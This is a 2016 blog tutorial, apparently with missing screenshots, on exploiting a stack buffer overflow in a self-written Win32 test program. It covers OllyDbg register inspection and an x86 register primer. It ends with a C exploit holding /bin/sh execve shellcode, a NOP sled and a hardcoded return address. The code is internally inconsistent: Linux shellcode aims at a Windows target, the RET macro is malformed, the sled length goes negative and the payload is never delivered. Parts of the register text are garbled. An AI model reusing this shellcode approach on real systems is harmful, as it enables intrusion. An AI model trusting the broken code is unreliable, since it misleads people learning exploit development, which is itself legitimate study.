четверг, 24 ноября 2016 г.

Bufferoverflow stack exploit

How to write exploit to the tool. 
I will try to do it writing the simple programm in C









Use the CodeBlock for creating the consol application for  Win32














Open in  HexWorkwhop













Open in Ollybdg and run 
















Make  -> Run 
















ESP : stack pointer 0022FF8C
EIP : instruction pointer 00401280
EBP : base pointer 0022FF94

Try to use the application, enter the  word and run.  Then loot at the registers. 













ESP : stack pointer 0022FF70
EIP : instruction pointer 00401283
EBP : base pointer 0022FF94

REGISTERS - components of the processor that stores data and address

Processor register
The 32-bit processor architecture present
- Ten 32-bit, and six 16-bit registers

Registers are divided into three categories:
- The main registers
- Control registers
- Segment registers

The main registers are divided into:
- Data registers - data
- Pointer registers - Indices
- Index registers - index

DATA REGISTERS - data register
For a 32-bit register used for arithmetic, logical, and others. Operations
- 32-bit registers -> EAX, EBX, ECX, EDX
- The lower register is used as a 16-bit -> AX, BX, CX, DX
- The lower registers are used as 8-bit -> AH, AL, BH, BL, CH, CL, DH, DL

AX - (premary accumulation) prevonachalnoe accumulation is used in input / output and most arifmiticheskih instructions.
BX - (base register) main index - Try Us for indexing addresses
CX - (counter regeister) Register graphs - cycles and interactive operation
DX - (data register) data register - used input / output, multiplication, division

POINTER REGISTERS - pointer registers
Registers pointers 32-bit EIP, ESP, EBP, and 16-bit registers IP, SP, BP

Three REGISTERS category SIGNS - POINTER REGISTERS:

- Instruction Pointer (IP) - the instruction pointer
16-bit register holds the IP addresses for the offset of the next instruction to be executed.
IP associated with the CS register (CS: IP) enables the full address of the current instruction in the code segment.
Segment address (offset) - start address memory segment with an offset value.

- Stack Pointer (SP) - the stack pointer
16-bit SP register provides the offset value of the stack in the stack program.
SP register associated with the SS (SS: SP) refers to the current position data and addresses in the program stack.

- Base Pointer (BP) - MAIN INDEX
16-bit BP register is mainly refers to the parameter variables passing through the code.
Address register SS combined with BP in the stack may also be combined with SI and DI as the main
Register to a special address.

INDEX REGISTER - INDEXING address (sometimes used in operations arifmiticheskih)
32-bit -> ESI, EDI
16-bit -> SI, DI

Source Index (SI) - the source code
Destination Index (DI) - the index of destination of

















































Enter the count of symbol exceeds the  buffer -  55 symbol 














We see the bufferoverflow stack 






























Try to write the exploit














//Exploit for target.exe
#include<process.h>                                                                                        //запустить другую программу
#include<stdio.h>
#include<errno.h>
#include<stdlib.h>
#include<string.h>
#include<dos.h>

/* Минимальный shellcode */
static char shellcode[]=
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

#define NOP     0x90
#define LEN     88                                                                                             //lpBuffer 58h -> decimal 88
#define RET     770F6BF4                                                                                //return address from Ollydbg

int main()
{
char buffer[LEN];
long retaddr = RET;
int i;

fprintf(stderr,"using address 0x%lx\n",retaddr);       //fprint выполняет форматированный вывод в поток
                                                                                              // stderr вывод сообщений об ошибках на экран

/* заполяем весь буфер адресом возврата */
for (i=0;i<LEN;i+=4)                                                                                                                         //4 byte
   *(long *)&buffer[i] = retaddr;

/* заполняет начальный буфер NOP's, 60 массив меньше чем размер буфера,
 таким образом помещается шелкод и адрес возрата  */
for (i=0;i<(LEN-strlen(shellcode)-100);i++)
   *(buffer+i) = NOP;

/* после заполнения NOP's, копируем в execve() shellcode */
memcpy(buffer+i,shellcode,strlen(shellcode));

/* export the variable, run */

execlp("target.exe", NULL);                          //запускаем target.exe
return 0;
}

Комментариев нет:

Отправить комментарий